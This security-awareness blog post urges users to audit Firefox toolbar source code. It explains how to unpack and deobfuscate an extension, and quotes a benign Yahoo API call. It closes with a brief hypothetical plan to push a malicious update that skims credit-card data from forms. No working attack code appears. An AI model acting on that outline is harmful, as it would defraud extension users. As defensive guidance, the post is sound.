Do you look at the source code of Firefox Toolbars that you install?

Few people do. Most people assume that if a toolbar has been written about in the SEO community it must be ok. One such toolbar was making the rounds a few weeks ago. I'm not going to name names, but this article will take look at a toolbar that is actually out there in the wild that you may have downloaded.

Almost every SEO's computer that I've seen has about 30 Firefox extensions loaded. People write articles about how great extensions are, but nobody ever talks about the security ramifications. Nobody ever thinks about what is in their Word Press theme either.

A toolbar is an especially dangerous security hole if used for evil. While javascript run from a page is limited by the security functions of your browser, a toolbar runs with the same capabilities as your browser itself. Firefox protects you from cross site scripting attacks, while a toolbar permits it. A toolbar can access your filesystem. For instance, it could save a binary to your machine that you don't know about. You need to be careful about what you're downloading.

First, how do you go about looking at the source code of a Firefox Toolbar? It's actually quite easy. In Firefox, just right-click on the link to the toolbar and select "Save Page As". That will download a .XPI file to your computer. It's just a zip file, and you can open it with Winzip and take a look.

Isn't it a violation of the Terms of Service to look at the source code of a toolbar? If they've got a TOS that won't let you look at the toolbar code, I'd run for the hills. There's obviously something to hide. Is it protected by trade secret? That .XPI file is a well known format, so it's no more protected than an HTML file you read in your browser. Claiming that's a secret is like claiming a virus is protected by trade secret and you're not allowed to look for it. For the record, this particular toolbar didn't have a TOS. By downloading it, you're basically agreeing to let it do whatever it does.

Let's take a look at the source code for this popular toolbar. It starts with something ominious:

Eval just tells javascript to look at the string inside the parenthesis and evaluate it as if it were straight source code. In this case, our toolbar author has decided to encrypt the source code. If you look in the .js file, you only see a bunch of gibberish, which the code converts to actual souce code and then executes. That's not a good sign. Why would the author shroud their code unless they feared you looking through it?

This type of obfuscation is easy enough to overcome. First, copy the code and run it through a code beautifier. This will output the code in an easily readable form. But it's still encrypted, so we'll just write a little code that looks something like:

This runs the packed/encrypted code through their own function, but instead of evaluating the code inside your browser, merely display it to the output stream. Now you can go looking for anything evil.

Generally, the evil things can be found using the HttpRequest function. That's what tells the browser to send data to another web page, which is how something can "phone home" or do things on your behalf. I didn't find anything especialy evil in this toolbar, but I did find:

this.xmlHttp.open("GET", 'http://api.search.yahoo.com/WebSearchService/V1/webSearch?appid=YahooDemo&output=json&results=100&query=' query '&start=' pos, true);

This code sends a URL to the Yahoo Site Explorer API to find the backlinks. There's nothing wrong with that, except that they're using "YahooDemo" for the application id. That's a violation of Yahoo's TOS. You're supposed to apply for and use your own application id.

The other TOS violation is almost amusing. They're calling Google to get the PageRank of a page, a clear violation of the TOS. Here's the code:

I can't see that the DoICare variable is used anywhere other than as an inside joke by the programmer. He knows he's violating Google's TOS by mining pagerank.

One last thing to note is that this toolbar adds a function to OnPageLoad to check to see if you're on their site. If you are, it does some extra calculations. This is how they add cool stuff to your viewing of their reports. That's all well and goood, but it's also adding the overhead of a function call for every page you ever load again in your browser. Do this with 30 "free" extensions and pretty soon you're starting to slow down.

Why should you care? At some point Google and Yahoo may get upset with your violation of their TOS. You're running the tool from your browser and you're performing the searches that violate their TOS. They may very well just ban your IP. How much of a hassle will it be if you get your IP banned? Was it really worth the time saved by using this toolbar? And wouldn't you rather know what it's doing on your behalf? And frankly, how hard will it be for Google and Yahoo to break this toolbar by changing the name of the demo key or the encryption on PageRank?

There's one last consideration in downloading a toolbar. Firefox has a handy service where a toolbar automatically checks to see if a new version is available, and when you reboot your browser you can automatically install the new version. So how many times do you check for malicious code in a new version of a trusted friend?

If I was a Nigerian scammer or Russian Mafiaso, I'd write a toolbar that did something really cool and get thousands of people to download it. Perhaps even replicate something for free that people currently pay for. The toolbar wouldn't do anything evil. I'd just bide my time while I built up a huge user base. Then I'd make a release of a new version. That version would be a little improvement, but it would also add a function that gets attached to form submission that does a regular expression search for credit card information, then sends that information back to my server. Even if it was spotted quickly (and the chances are that it wouldn't be, because nobody looks at the code of upgrades), I'd still get enough fraudulent credit card numbers to retire.

And if you got caught in that, it would be your own fault. You never looked.